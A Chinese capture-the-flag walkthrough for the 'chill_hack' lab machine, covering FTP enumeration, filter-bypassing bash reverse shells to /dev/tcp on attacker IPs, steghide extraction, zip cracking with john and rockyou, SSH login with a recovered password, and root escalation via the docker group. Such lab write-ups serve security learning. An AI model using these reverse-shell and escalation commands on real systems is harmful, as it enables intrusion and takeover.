chill_hack靶机攻略

chill_hack靶机攻略

扫描

渗透

ftp开放,提示ftp连接

连接过后发现一个文本文件

下载下来

复制代码
ftp 10.4.7.155
ftp
ftp
dir
get note.txt

查看内容

此处可以知道两个用户名,并且提示命令被过滤

复制代码
bash${IFS}-c${IFS}'bash${IFS}-i${IFS}>&${IFS}/dev/tcp/10.4.7.132/8888 0>&1'
bash${IFS}-c${IFS}'bash${IFS}-i${IFS}>&${IFS}/dev/tcp/10.4.7.138/12138 0>&1'

提权

使用sudo -l

发现可以以appar身份执行.sh文件

看代码感觉没什么用

在/var/www/files中发现hacker.php

查看源码

两行提示可能有图片隐写

靶机开启pythonweb服务

使用工具

复制代码
steghide extract -sf hacker-with-laptop_23-2147985341.jpg

发现有个压缩包,但是解压需要密码

复制代码
zip2john backup.zip > backup.john
# 将名为 backup.zip 的 ZIP 文件的密码哈希提取出来,并将结果保存到名为 backup.john 的文件中

john --wordlist=/usr/share/wordlists/rockyou.txt backup.john 
复制代码
pass1word

查看一下解压出来的东西

发现密文

复制代码
IWQwbnRLbjB3bVlwQHNzdzByZA==
#base64解码
!d0ntKn0wmYp@ssw0rd

家目录下可以看到有三个用户,挨个尝试ssh登录,发现只有anurodh可以登录

复制代码
anurodh:!d0ntKn0wmYp@ssw0rd

id发现该用户在docker组内

怀疑在docker里

查看该文件,确认一下是不是在docker里

发现就是在docker里

查看docker镜像

复制代码
docker images

提权

复制代码
docker run -it -v /root:/mnt alpine
相关推荐
李景琰4 分钟前
多级缓存架构与一致性核心挑战:基于Caffeine本地缓存、Redis分布式缓存与MySQL数据库的多级缓存数据一致性方案
数据库·缓存·架构
思茂信息7 分钟前
CST软件对Customer Success OPPO手机电源适配器EMC仿真
开发语言·嵌入式硬件·matlab·3d·智能手机·cst
缺点内向1 小时前
如何在 C# 中将 Excel 工作表拆分为多个窗格
开发语言·c#·.net·excel
盼哥PyAI实验室1 小时前
MySQL 数据库基础:字段判空、逻辑查找、排序、限制、模糊搜索与聚合函数全解析
数据库·mysql·oracle
少废话h2 小时前
解决Flink中ApacheCommonsCLI版本冲突
开发语言·python·pycharm
天命码喽c2 小时前
GraphRAG-2.7.0整合Milvus-2.5.1
开发语言·python·milvus·graphrag
后端小张2 小时前
【JAVA进阶】Spring Boot 核心知识点之自动配置:原理与实战
java·开发语言·spring boot·后端·spring·spring cloud·自动配置
v***91304 小时前
【MySQL】JDBC的连接
数据库·mysql
j***51894 小时前
Redis 安装及配置教程(Windows)【安装】
数据库·windows·redis
A***F1577 小时前
Redis开启远程访问
数据库·redis·缓存